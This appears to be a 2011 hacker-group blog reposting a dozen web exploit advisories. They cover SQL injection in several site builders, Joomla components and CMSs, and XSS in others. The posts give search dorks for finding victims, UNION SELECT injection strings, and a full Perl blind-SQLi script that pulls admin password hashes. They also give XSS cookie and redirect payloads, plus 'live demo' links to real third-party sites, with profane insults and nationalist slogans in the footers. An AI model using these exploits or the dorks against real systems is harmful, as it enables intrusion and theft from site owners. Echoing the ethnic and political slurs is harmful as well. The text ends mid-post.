Wednesday, May 4, 2011

IRL DIGITAL MEDIA (index.php?c=) SQL-i Vulnerability

=========================================================================
IRL DIGITAL MEDIA (index.php?c=) SQL-i Vulnerability
==========================================================================

+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
+=+=+= +=+=+=
+=+=+= /\ | | | | ________ _____ _____ __ _ __ +=+=+=
+=+=+= / \ | |__| | _____ / ______/ | _ \ | ____|\ \ / \ / / +=+=+=
+=+=+= / /\ \| |__| | /_____/ | | | |_) / | |__ \ \/ \/ / +=+=+=
+=+=+= / ____ \ | | | | |_______ | __\ \ | __| \ / +=+=+=
+=+=+= /_/ \_\| | | |________/ |_| \_\ | |_______\_____/_____ +=+=+=
+=+=+= |_____________________|+=+=+=
+=+=+= +=+=+=
+=+=+= X-n3t - **RoAd_KiLlEr** - The|Denny` - The_1nv1s1bl3 +=+=+=
+=+=+= +=+=+=
+=+=+= 0ne Nation , 0ne People , 0ne Culture , 0ne Language = Ethnic Albania +=+=+=
+=+=+= +=+=+=
+=+=+= ....::: | ALBANIAN HACKING CREW | :::.... 2011 +=+=+=
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
0 0
1 ########################################### 1
0 I'm **RoAd_KiLlEr** member from 1337 DAY Team 1
1 ########################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+]Title :.......IRL DIGITAL MEDIA (index.php?c=) SQL-i Vulnerability
[+]Author :......**RoAd_KiLlEr**
[+]Tested on :...Win Xp Sp 2/3
---------------------------------------------------------------------------
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: sukihack[at]gmail[dot]com
[~] Home: http://1337day.com/author/2447 & http://road-killer.blogspot.com
[~] Original Advisory:http://road-killer.blogspot.com/2011/05/leading-edge-technology-solutions-lets.html
[~] Vendor: http://www.irldigitalmedia.com

==========ExPl0iT3d by **RoAd_KiLlEr**==========



[+] DORK: 2008 IRL Media Ltd. Registered in England, Company No. 6372391. All rights reserved. Data Protection Act

Registration No. Z1078086.



[+] Description:

IRL DIGITAL MEDIA is a full service web design and online marketing agency. We specialise in developing beautifully presented

websites combined with targeted online marketing campaigns with a focus on Return on Investment.

Our promise is that we will spend your money as if it was our own, maximising the effectiveness of every penny of your

investment. You will not find a more personal or better value service anywhere.




[ I ]. SQL-i Vulnerability
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+



[+++] Important: Every web page developed by IRL DIGITAL MEDIA is vulnerable to Sql-Injection.

Use the Dork to find websites,than go to "index.phpc=" .

Input passed via the "c" parameter in "index.php" file is not properly sanitised before being used in SQL queries.

So we can use that to inject arbitrary SQL code





[P0C]: http://127.0.0.1/path/index.php?c=[SQL INJECTION]




[L!v3 D3m0's]:

http://www.clickcashback.co.uk/index.php?c='18

https://www.paulcrowley.co.uk/index.php?c='89

http://justfundraising.co.uk/index.php?c='22

https://irldigitalmedia.com/index.php?c='23









[+] TIME TABLE:

04 May 2011 - Vulnerability discovered.
05 May 2011 - Advisory released.


===========================================================================================
[!] Albanian Hacking Crew
===========================================================================================
[!] **RoAd_KiLlEr**
===========================================================================================
[!] MaiL: sukihack[at]gmail[dot]com
===========================================================================================
[!] Greetz To : Ton![w]indowS | X-n3t | The|DennY` | THE_1NV1S1BL3 | KHG & All Albanian/Kosova Hackers
===========================================================================================
[!] Spec Th4nks: r0073r | indoushka | Sid3^effects | DoNnY | MaFiTeRRoR | All 1337day Members | And All My Friendz
===========================================================================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
===========================================================================================

Leading Edge Technology Solutions (L.E.T.S) SQL-i Vulnerability

=========================================================================
Leading Edge Technology Solutions (L.E.T.S) SQL-i Vulnerability
==========================================================================

+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
+=+=+= +=+=+=
+=+=+= /\ | | | | ________ _____ _____ __ _ __ +=+=+=
+=+=+= / \ | |__| | _____ / ______/ | _ \ | ____|\ \ / \ / / +=+=+=
+=+=+= / /\ \| |__| | /_____/ | | | |_) / | |__ \ \/ \/ / +=+=+=
+=+=+= / ____ \ | | | | |_______ | __\ \ | __| \ / +=+=+=
+=+=+= /_/ \_\| | | |________/ |_| \_\ | |_______\_____/_____ +=+=+=
+=+=+= |_____________________|+=+=+=
+=+=+= +=+=+=
+=+=+= X-n3t - **RoAd_KiLlEr** - The|Denny` - The_1nv1s1bl3 +=+=+=
+=+=+= +=+=+=
+=+=+= 0ne Nation , 0ne People , 0ne Culture , 0ne Language = Ethnic Albania +=+=+=
+=+=+= +=+=+=
+=+=+= ....::: | ALBANIAN HACKING CREW | :::.... 2011 +=+=+=
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
0 0
1 ########################################### 1
0 I'm **RoAd_KiLlEr** member from 1337 DAY Team 1
1 ########################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+]Title :.......Leading Edge Technology Solutions (L.E.T.S) SQL-i Vulnerability
[+]Author :......**RoAd_KiLlEr**
[+]Tested on :...Win Xp Sp 2/3
---------------------------------------------------------------------------
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: sukihack[at]gmail[dot]com
[~] Home: http://1337day.com/author/2447

[~] Vendor: http://www.leadedgetech.com

==========ExPl0iT3d by **RoAd_KiLlEr**==========



[+] DORK: intext:Website By L.E.T.S



[+] Description:

At Leading Edge Technologies Web Design grows out of a moment of inspiration. Whether for the innovator or small business entrepreneur, our mission is to conduct surveys and analyze the existing data of market production on specific products. Successful business entities evaluate competitors, target demographic data and explore product information from reliable sources as the easiest and safest way to prove success.

One of the most important components of success or failure in the e-commerce arena is to target the popularity of your services. Each product has a unique selling proposition and each product has a unique value to customers.




[ I ]. SQL-i Vulnerability
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+



[+++] Important: Every web page developed by L.E.T.S is vulnerable to Sql-Injection.

Use the Dork to find websites,than find any "php" file with "id" parameter [ .php?id= ].






[P0C]: http://127.0.0.1/testimonial.detail.view.php?ID=[SQL INJECTION]




[L!v3 D3m0's]:

http://www.grainviewdesigns.com/testimonial.detail.view.php?ID=17+and+1=0+Union+select+1,2,@@version,user(),database(),6,7,8,9,10,11,12,13--

http://www.bni-leadingedge.com/profile.detail.php?STARTR=0&MPID=30+and+1=0+Union+select+1,2,3,@@version,user(),database(),7,8,9,10,11,12,13,14,15,16,17--









[+] TIME TABLE:

04 May 2011 - Vulnerability discovered.
05 May 2011 - Advisory released.


===========================================================================================
[!] Albanian Hacking Crew
===========================================================================================
[!] **RoAd_KiLlEr**
===========================================================================================
[!] MaiL: sukihack[at]gmail[dot]com
===========================================================================================
[!] Greetz To : Ton![w]indowS | X-n3t | The|DennY` | THE_1NV1S1BL3 | KHG & All Albanian/Kosova Hackers
===========================================================================================
[!] Spec Th4nks: r0073r | indoushka | Sid3^effects | DoNnY | MaFiTeRRoR | All 1337day Members | And All My Friendz
===========================================================================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
===========================================================================================

Monday, May 2, 2011

Joomla Component com_seyret Blind SQL Injection Vulnerability

=============================================================
Joomla Component com_seyret Blind SQL Injection Vulnerability
=============================================================


[+]Title :Joomla Component (com_seyret) Blind SQL Injection Exploit
[+]Author :**RoAd_KiLlEr**
[+]Contact :RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[+]Tested on :Win Xp Sp 2/3
---------------------------------------------------------------------------
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[~] Home: http://a-h-crew.net
[~] Vendor:http://joomlaholic.com/
[~] Download App:http://joomlaholic.com/downloads/2-seyret-video-component
==========ExPl0iT3d by **RoAd_KiLlEr**==========

[+]EXPLOIT:

#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
system("Title Albanian Hacking Crew");
print " \n";
print " #######################################################################\n";
print " # Joomla Component (com_seyret) Blind SQL Injection Exploit \n";
print " # -----------------------------------------------------------\n";
print " # Author: **RoAd_KiLlEr** \n";
print " # Greetz: Ton![W]indowS,X-n3t,b4cKd00r ~,DarkHacker.,The|DennY`\n";
print " # Site: www.a-h-crew.net\n";
print " # -----------------------------------------------------------\n";
print " # Dork : inurl:com_seyret \n";
print " # Usage: perl exploit.pl host path <options> \n";
print " # Example: perl exploit.pl www.host.com /path/ -a 3 \n";
print " # -----------------------------------------------------------\n";
print " # Options: \n";
print " # -a valid id \n";
print " #######################################################################\n";
exit;
}

my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $aid = $ARGV[2];

my %options = ();
GetOptions(\%options, "u=i", "p=s", "a=i");

print "[~] Exploiting...\n";

if($options{"u"})
{
$userid = $options{"u"};
}

if($options{"a"})
{
$aid = $options{"a"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $userid, $aid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $userid, $aid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}

print "\n[~] Exploiting done\n";

sub istrue2
{
my $host = shift;
my $path = shift;
my $uid = shift;
my $aid = shift;
my $i = shift;
my $h = shift;

my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php? option=com_seyret&task=videodirectlink&id=".$aid." and ascii(SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=".$h."";

if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}

my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "Back";

if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}

}



===========================================================================================
[!] Albanian Hacking Crew
===========================================================================================
[!] **RoAd_KiLlEr**
===========================================================================================
[!] MaiL: sukihack[at]gmail[dot]com
===========================================================================================
[!] Greetz To : Ton![w]indowS | X-n3t | b4cKd00r ~ | DarKHackeR. | The|DennY` | EaglE EyE | Lekosta | KHG | THE_1NV1S1BL3 & All Albanian/Kosova Hackers
===========================================================================================
[!] Spec Th4nks: Inj3ct0r.com & r0073r | indoushka from Dz-Ghost Team | MaFFiTeRRoR | Sid3^effects | The_Exploited | And All My Friendz
===========================================================================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
===========================================================================================




ADVISORY LINK:    http://1337day.com/exploits/10205
                                   http://www.exploit-db.com/exploits/14172

Joomla Component com_dateconverter SQL Injection Vulnerability

==============================================================
Joomla Component com_dateconverter SQL Injection Vulnerability
==============================================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################### 1
0 I'm **RoAd_KiLlEr** member from Inj3ct0r Team 1
1 ########################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+]Title Joomla Component com_dateconverter SQL Injection Vulnerability
[+]Author **RoAd_KiLlEr**
[+]Contact RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[+]Tested on Win Xp Sp 2/3
---------------------------------------------------------------------------
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[~] Home: http://a-h-crew.net
[~] Vendor: http://sourceforge.net/projects/date-converter/
[~] Download App:http://sourceforge.net/projects/date-converter/files/com_dateconverter-0.1-beta.zip/download
==========ExPl0iT3d by **RoAd_KiLlEr**==========

[+]Description:
Joomla AD/BS Date Converter is a Joomla Component used to convert date between Gregorian Calendar and Bikram Sambat Calendar. BS Calendar is used in Nepal, India, Bhutan, Sri Lanka, Thailand etc.
=========================================

[+] Dork: inurl:"com_dateconverter"

==========================================


[+]. SQL-i Vulnerability
=+=+=+=+=+=+=+=+=+

[Exploit]: http://127.0.0.1/path/index.php?option=com_dateconverter&Itemid=[] <== SQL-i



===========================================================================================
[!] Albanian Hacking Crew
===========================================================================================
[!] **RoAd_KiLlEr**
===========================================================================================
[!] MaiL: sukihack[at]gmail[dot]com
===========================================================================================
[!] Greetz To : Ton![w]indowS | X-n3t | b4cKd00r ~ | DarKHackeR. | The|DennY` | EaglE EyE | Lekosta | KHG | THE_1NV1S1BL3 & All Albanian/Kosova Hackers
===========================================================================================
[!] Spec Th4nks: Inj3ct0r.com & r0073r | indoushka from Dz-Ghost Team | MaFFiTeRRoR | Sid3^effects | The_Exploited | And All My Friendz
===========================================================================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
===========================================================================================


# 1337day.com [2010-07-01]


ADVISORY LINK:  http://1337day.com/exploits/13079
                                 http://www.exploit-db.com/exploits/14154

Joomla Component com_wmtpic SQL Injection Vulnerability

=======================================================
Joomla Component com_wmtpic SQL Injection Vulnerability
=======================================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################### 1
0 I'm **RoAd_KiLlEr** member from Inj3ct0r Team 1
1 ########################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+]Title : Joomla Component com_wmtpic SQL Injection Vulnerability
[+]Author : **RoAd_KiLlEr**
[+]Contact : RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[+]Tested on : Win Xp Sp 2/3
---------------------------------------------------------------------------
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[~] Home: http://a-h-crew.net
[~] Vendor: http://www.webmaster-tips.net
[~] Download App:http://www.webmaster-tips.net/Download/View-details/9-Joomla-Components/183-Joomla-1.5-Flash-Gallery-wmtPic.html
==========ExPl0iT3d by **RoAd_KiLlEr**==========

[+]Description:
Flash based image gallery for Joomla. Joomla component wmtPic, with thumbnail support, caption and multiple file upload option. Although it is not a must, it is better to put a link back to this site "Joomla component by Webmaster-tips.net " on your website if you can. This Joomla 1.5 Component is licensed under the GPLv2.0.

=========================================

[+] Dork: inurl:"com_wmtpic"

==========================================


[+]. SQL-i Vulnerability
=+=+=+=+=+=+=+=+=+

[Exploit]: http://127.0.0.1/path/index.php?option=com_wmtpic&Itemid=[] <== SQL-i



===========================================================================================
[!] Albanian Hacking Crew
===========================================================================================
[!] **RoAd_KiLlEr** Says: Fuck You EraGon,Fuck Dark Hackers Team & Mos u shti me baben se baba ta qin nanen ;)
===========================================================================================
[!] MaiL: sukihack[at]gmail[dot]com
===========================================================================================
[!] Greetz To : Ton![w]indowS | X-n3t | b4cKd00r ~ | DarKHackeR. | The|DennY` | EaglE EyE | Lekosta | KHG | THE_1NV1S1BL3 & All Albanian/Kosova Hackers
===========================================================================================
[!] Spec Th4nks: Inj3ct0r.com & r0073r | indoushka from Dz-Ghost Team | MaFFiTeRRoR | Sid3^effects | The_Exploited | And All My Friends
===========================================================================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
===========================================================================================


# 1337day.com [2010-06-30]


ADVISORY LINK:  http://1337day.com/exploits/12850
                                 http://www.exploit-db.com/exploits/14128/

Rave Creations (artists.asp) XSS Multiple Vulnerabilities

=========================================================
Rave Creations (artists.asp) XSS Multiple Vulnerabilities
=========================================================


[+]Title Rave Creations (artists.asp) XSS Multiple Vulnerabilities
[+]Author **RoAd_KiLlEr**
[+]Contact RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[+]Tested on Win Xp Sp 2/3
---------------------------------------------------------------------------
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[~] Home: http://a-h-crew.net
[~] Vendor :N/A
==========ExPl0iT3d by **RoAd_KiLlEr**==========


[+] Dork: Sitedesign by: Dieleman www.dieleman.nl - Copyright ? 2010

==========================================


[1]. XSS Vulnerability
=+=+=+=+=+=+=+=+=+

Poc/Exploit:
~~~~~~~~~

http://127.0.0.1/[path]/artists.asp?id=[Exploit]


[Exploit]: "><script>alert(document.cookie)</script>

Dem0:
~~~~~
http://www.u-h-m.de/artists.asp?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

[2]. HTML Injection
=+=+=+=+=+=+=+=+=+

Poc/Exploit:
~~~~~~~~~

http://127.0.0.1/[path]/artists.asp?id=[Exploit]

[Exploit]: ">><marquee><h1><font color=Red size=16>XSS by **RoAd_KiLlEr**</font></h1><marquee>

Dem0:
~~~~~
http://www.u-h-m.de/artists.asp?id=%22%3E%3E%3Cmarquee%3E%3Ch1%3E%3Cfont%20color=Red%20size=16%3EXSS%20by%20**RoAd_KiLlEr**%3C/font%3E%3C/h1%3E%3Cmarquee%3E

[3]. URL Redirect Vulnerability
=+=+=+=+=+=+=+=+=+

Poc/Exploit:
~~~~~~~~~

http://127.0.0.1/[path]/artists.asp?id=[Exploit]

[Exploit]: "><script>alert(document.cookie)</script><HTML><HEAD><TITLE>Redirect...</TITLE><META HTTP-EQUIV="REFRESH" CONTENT="0; URL=http://www.inj3ct0r.com"></HEAD><BODY>Redirect ...</BODY></HTML>

Dem0:
~~~~~
http://www.u-h-m.de/artists.asp?id="><script>alert(document.cookie)</script><HTML><HEAD><TITLE>Redirect...</TITLE><META HTTP-EQUIV="REFRESH" CONTENT="0; URL=http://www.inj3ct0r.com"></HEAD><BODY>Redirect ...</BODY></HTML>

===========================================================================================
[!] Albanian Hacking Crew
===========================================================================================
[!] **RoAd_KiLlEr** Says: Fuck You EraGon,Fuck Dark Hackers Team & Mos u shti me baben se baba ta qin nanen ;)
===========================================================================================
[!] MaiL: sukihack[at]gmail[dot]com
===========================================================================================
[!] Greetz To : Ton![w]indowS | X-net | b4cKd00r ~ | DarKHackeR. | The|DennY` | EaglE EyE | Lekosta | KHG | THE_1NV1S1BL3 & All Albanian/Kosova Hackers
===========================================================================================
[!] Spec Th4nks: Inj3ct0r.com | indoushka from Dz-Ghost Team | Sniper Hail
| NEO from DATA ir Security Group | MaFFiTeRRoR | Sid3^effects | The_Exploited | And All My Friends
===========================================================================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
===========================================================================================


# 1337day.com [2010-06-29]


ADVISORY LINK:  http://1337day.com/exploits/13034

Netvolution Content Management System XSS/HTML Injection Vulnerability

======================================================================
Netvolution Content Management System XSS/HTML Injection Vulnerability
======================================================================

[+]Title Netvolution Content Management System XSS/HTML Injection Vulnerability
[+]Author **RoAd_KiLlEr**
[+]Contact RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[+]Tested on Win Xp Sp 2/3
---------------------------------------------------------------------------
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[~] Home: http://a-h-crew.net
[~] Download App: http://www.netvolution.net/en/Netvolution-Content-Management-System
[~] Vendor: http://www.netvolution.net/
==========ExPl0iT3d by **RoAd_KiLlEr**==========


[+] Dork: allinurl:default.asp?pid= "la="

==========================================


[+]. XSS Vulnerability
=+=+=+=+=+=+=+=+=+

Go to any website and in the search box (its on top of webpage) put this code : "><script>alert(document.cookie)</script>

Dem0:
~~~~~
http://www.grnet.gr/default.asp?pid=85&la=2



[+]. HTML Injection
=+=+=+=+=+=+=+=+=+

This script is also Vulnerable to HTML Injection

For HTML injection Just put this code in the search Box : ">><marquee><h1><font color=Red size=16>XSS by **RoAd_KiLlEr**</font></h1><marquee>

Dem0:
~~~~~
http://lerosmarina.gr/?option=contents&task=Search&lang=en&query=Search%22%3E%3E%3Cmarquee%3E%3Ch1%3E%3Cfont+color%3DRed+size%3D16%3EXSS+by+%2A%2ARoAd_KiLlEr%2A%2A%3C%2Ffont%3E%3C%2Fh1%3E%3Cmarquee%3E

Or

http://www.grnet.gr/default.asp?pid=85&la=2




===========================================================================================
[!] Albanian Hacking Crew
===========================================================================================
[!] **RoAd_KiLlEr** Says: Fuck You EraGon,Fuck Dark Hackers Team & Mos u shti me baben se baba ta qin nanen ;)
===========================================================================================
[!] MaiL: sukihack[at]gmail[dot]com
===========================================================================================
[!] Greetz To : Ton![w]indowS | X-n3t | b4cKd00r ~ | DarKHackeR. | The|DennY` | EaglE EyE | Lekosta | KHG | THE_1NV1S1BL3 & All Albanian/Kosova Hackers
===========================================================================================
[!] Spec Th4nks: Inj3ct0r.com | indoushka from Dz-Ghost Team | Sniper Hail
| NEO from DATA ir Security Group | MaFFiTeRRoR | Sid3^effects | The_Exploited | And All My Friends
===========================================================================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
===========================================================================================


# 1337day.com [2010-06-29]


ADVISORY LINK:  http://1337day.com/exploits/13067

DowGroup SQL Injection Vulnerability

====================================
DowGroup SQL Injection Vulnerability
====================================


####################################
[+] Title: Dowgroup (dynamic.php?) id SQL Injection Vulnerability
[+] Author: **RoAd_KiLlEr**
[+] Software Link:http://www.dowgroup.com
[+] Tested on Win Xp Sp2/Sp3
[+] Where : From Remote
####################################
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[~] Home: http://a-h-crew.net
#####ExPl0iT3d by **RoAd_KiLlEr**######

[~] DORK: "powered by www.dowgroup.com"

####################################

[~]ExPl0iT : http://127.0.0.1//dynamic.php?id=[SQL-injection]


[~]Dem0: http://www.360mediadubai.com/dynamic.php?id='9 <= Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/media/public_html/dynamic.php on line 9

You have Trrigered a Error That means that is vulnerable to Sql injection :). Now you know what to do

####################################
[!]Albanian Hacking Crew
####################################
[!]**RoAd_KiLlEr** says: Fuck You Eragon , Ja baba po ti ban Exploitat Shko perdori , Llamer ;)
####################################
[!]Greetz To : Ton![w]indowS | X-n3t | b4cKd00r ~ | DarKHackeR. | The|DennY` | EaglE EyE | Lekosta | All Members From A-H-Crew.Net & All Albanian/Kosova Hackers | & All My Friends
####################################
[!] Spec Th4nks: Inj3ct0r.com | indoushka from Dz-Ghost Team | Sniper Hail | NEO from DATA ir Security Group | MaFFiTeRRoR
####################################
[!]MaiL: sukihack[at]gmail[dot]com
####################################
[!]Proud 2 b3:Albanian & Muslim
####################################






# 1337day.com [2010-06-27]


ADVISORY LINK: http://1337day.com/exploits/12996

View Photo (viewphoto.php) SQL Injection Vulnerability

======================================================
View Photo (viewphoto.php) SQL Injection Vulnerability
======================================================


[+] Title:View Photo (viewphoto.php?) SQL-i Vulnerability
[+] Author: **RoAd_KiLlEr**
[+] Software Link:N/A
[+] Tested on Win Xp Sp 2/3
[+] Category : Remote
===========================================================================================
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[~] Home: http://a-h-crew.net
==========Founded by **RoAd_KiLlEr**==========


[~] DORK: inurl:"viewphoto.php?id="

===========================================================================================

[~] P.O.C : http://127.0.0.1/path/viewphoto.php?id=[SQL-Injection]



[~] Demo : http://www.kidsthatcare.net/viewphoto.php?id='49

You trigered a SQL error,wich means webpage is vulnerable to SQL-Injection. You now what to do next :P

===========================================================================================
[!] Political Protest: Fuck You Israel , The REAL Terrorrist's of The WORLD
===========================================================================================
[!] **RoAd_KiLlEr**
===========================================================================================
[!] MaiL: sukihack[at]gmail[dot]com
===========================================================================================
[!] Greetz To : Ton![w]indowS | X-net | b4cKd00r ~ | DarKHackeR. | The|DennY' | EaglE EyE | Lekosta | KHG | All Members From A-H-Crew.Net & All Albanian/Kosova Hackers | All My Friends
===========================================================================================
[!] Spec Th4nks: Inj3ct0r.com | indoushka from Dz-Ghost Team | Sniper Hail | NEO from DATA ir Security Group
===========================================================================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
===========================================================================================



# 1337day.com [2010-06-06]


ADVISORY LINK: http://1337day.com/exploits/12555

News Read ID (read.php) SQL injection Vulnerability

===================================================
News Read ID (read.php) SQL injection Vulnerability
===================================================


####################################
# Title: News Read ID (read.php?) SQL Injection Vulnerability
# Author: **RoAd_KiLlEr**
# Software Link:N/A
# Tested on Win Xp
# CVE : N/A
####################################
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Mail: RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[~] Home: http://a-h-crew.net
####################################

[~] Component_Name:"read.php"

####################################

[~] DORK: inurl:"read.php?id="

####################################

[~] P.O.C : http://127.0.0.1/path/read.php?id=[SQL Injection]



[~] Demo : http://eye.box.sk/read.php?id='5425

You trigered an SQL error,wich means webpage is vulnerable to SQL-Injection. You now what to do next :P

####################################
Political Protest: Stop killing inocent Albanians,STOP etnical discrimination in F.Y.R Macedonia.F*ck SKOPJE 2014,And STOP stealing history from others.Screw your Encyklopedia. Freedom to all inocent Albanians in jails.
####################################
**RoAd_KiLlEr**
####################################
MaiL: sukihack[at]gmail[dot]com
####################################
Greetz To : Ton![w]indowS | X-net | b4cKd00r~ | DarKHackeR. | The|DennY' | EaglE EyE | Lekosta | KHG | All Members From A-H-Crew.Net & All Albanian/Kosova Hackers | All My Friends
####################################
Many Thanks to: Inj3ct0r.com
####################################
Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
####################################



# 1337day.com [2010-05-30]


ADVISORY LINK: http://1337day.com/exploits/12453

Communique Detail ID (communique_detail.php) SQL Injection Vulnerability

========================================================================
Communique Detail ID (communique_detail.php) SQL Injection Vulnerability
========================================================================


####################################
# Title: Communique Detail (communique_detail.php?id=) SQL Injection Vulnerability
# Author: **RoAd_KiLlEr**
# Software Link:N/A
# Tested on Win Xp / Lunix
# CVE : N/A
####################################
[~] Founded by **RoAd_KiLlEr**

[~] Component_Name:"communique_detail"

####################################
[~] DORK: inurl:"communique_detail.php?id="

####################################

[~]P.O.C : http://127.0.0.1/path/communique_detail.php?id=[SQL-injection]

####################################
**RoAd_KiLlEr**
####################################
Greetz To : Ton![w]indowS | X-net,b4cKd00r~ | DarKHackeR. | The|DennY' | EaglE EyE | Lekosta | All Members From A-H-Crew.Net & All Albanian/Kosova Hackers | & All My Friends
####################################
MaiL: sukihack[at]gmail[dot]com
####################################
Proud 2 b3:Albanian & Muslim
####################################



# 1337day.com [2010-05-29]



ADVISORY LINK: http://1337day.com/exploits/12447

Game ID (game.php) SQL Injection Vulnerability

==============================================
Game ID (game.php) SQL Injection Vulnerability
==============================================

# Title: Game ID (game.php) SQL Injection Vulnerability
# Version: 1.0
# Author: **RoAd_KiLlEr**
# Software Link:N/A
# Tested on Win Xp
# CVE : N/A

############ Founded By **RoAd_KiLlEr** #########

[~] Dork:inurl:"game.php?id="


[~] Exploit :

